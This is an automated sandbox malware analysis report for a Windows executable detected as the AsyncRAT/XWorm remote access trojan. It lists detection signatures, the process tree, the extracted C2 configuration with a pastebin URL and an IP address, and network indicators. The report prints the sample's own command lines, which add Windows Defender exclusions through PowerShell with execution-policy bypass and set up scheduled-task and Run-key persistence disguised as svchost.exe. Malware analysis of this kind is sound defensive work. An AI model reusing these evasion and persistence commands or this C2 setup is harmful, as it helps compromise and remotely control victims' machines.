Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a9YMw44iQq.exe

Overview

General Information

Sample name:a9YMw44iQq.exe
renamed because original name is a hash value
Original sample name:4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22.exe
Analysis ID:1570400
MD5:f068a2f351d11284fee8d768a64f6c9c
SHA1:6fcba43b6b6024c8795d699f638444654714c276
SHA256:4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • a9YMw44iQq.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\a9YMw44iQq.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)
    • powershell.exe (PID: 2444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6416 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2716 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)
  • svchost.exe (PID: 1016 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)
  • svchost.exe (PID: 5832 cmdline: "C:\ProgramData\svchost.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)
  • svchost.exe (PID: 6400 cmdline: "C:\ProgramData\svchost.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)
  • svchost.exe (PID: 4148 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["https://pastebin.com/raw/vJmE27fr"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "svchost.exe"}
SourceRuleDescriptionAuthorStrings
a9YMw44iQq.exeJoeSecurity_XWormYara detected XWormJoe Security
    a9YMw44iQq.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      a9YMw44iQq.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf2c5:$s6: VirtualBox
      • 0xf223:$s8: Win32_ComputerSystem
      • 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x115d7:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\ProgramData\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\ProgramData\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf2c5:$s6: VirtualBox
          • 0xf223:$s8: Win32_ComputerSystem
          • 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x115d7:$cnc4: POST / HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xf0c5:$s6: VirtualBox
              • 0xf023:$s8: Win32_ComputerSystem
              • 0x120cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x12168:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x1227d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x113d7:$cnc4: POST / HTTP/1.1
              Process Memory Space: a9YMw44iQq.exe PID: 6216JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Process Memory Space: a9YMw44iQq.exe PID: 6216JoeSecurity_XWormYara detected XWormJoe Security
                  SourceRuleDescriptionAuthorStrings
                  0.0.a9YMw44iQq.exe.150000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.0.a9YMw44iQq.exe.150000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.a9YMw44iQq.exe.150000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xf2c5:$s6: VirtualBox
                      • 0xf223:$s8: Win32_ComputerSystem
                      • 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x115d7:$cnc4: POST / HTTP/1.1

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetFilename: C:\ProgramData\svchost.exe
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 5.166.171.54, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49819
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", ProcessId: 6416, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-06T22:52:08.141883+010028559241Malware Command and Control Activity Detected192.168.2.6498195.166.171.545552TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: a9YMw44iQq.exeAvira: detected
                      Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Source: a9YMw44iQq.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/vJmE27fr"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "svchost.exe"}
                      Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 76%
                      Source: a9YMw44iQq.exeReversingLabs: Detection: 76%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                      Source: a9YMw44iQq.exeJoe Sandbox ML: detected
                      Source: a9YMw44iQq.exeString decryptor: https://pastebin.com/raw/vJmE27fr
                      Source: a9YMw44iQq.exeString decryptor: <123456789>
                      Source: a9YMw44iQq.exeString decryptor: <Xwormmm>
                      Source: a9YMw44iQq.exeString decryptor: Test
                      Source: a9YMw44iQq.exeString decryptor: svchost.exe
                      Source: a9YMw44iQq.exeString decryptor: %ProgramData%
                      Source: a9YMw44iQq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49812 version: TLS 1.2
                      Source: a9YMw44iQq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49819 -> 5.166.171.54:5552
                      Source: Malware configuration extractorURLs: https://pastebin.com/raw/vJmE27fr
                      Source: unknownDNS query: name: pastebin.com
                      Source: Yara matchFile source: a9YMw44iQq.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.6:49819 -> 5.166.171.54:5552
                      Source: global trafficHTTP traffic detected: GET /raw/vJmE27fr HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewASN Name: ER-TELECOM-ASRU ER-TELECOM-ASRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.166.171.54
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /raw/vJmE27fr HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miB
                      Source: a9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsx
                      Source: a9YMw44iQq.exe, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: a9YMw44iQq.exe, 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000002.00000002.2226616420.0000023378537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: powershell.exe, 00000002.00000002.2226475493.0000023378450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coJ
                      Source: powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coK
                      Source: powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000008.00000002.2458910527.000002AD747D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                      Source: powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000012.00000002.2864690740.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vJmE27fr
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49812 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR

                      Operating System Destruction

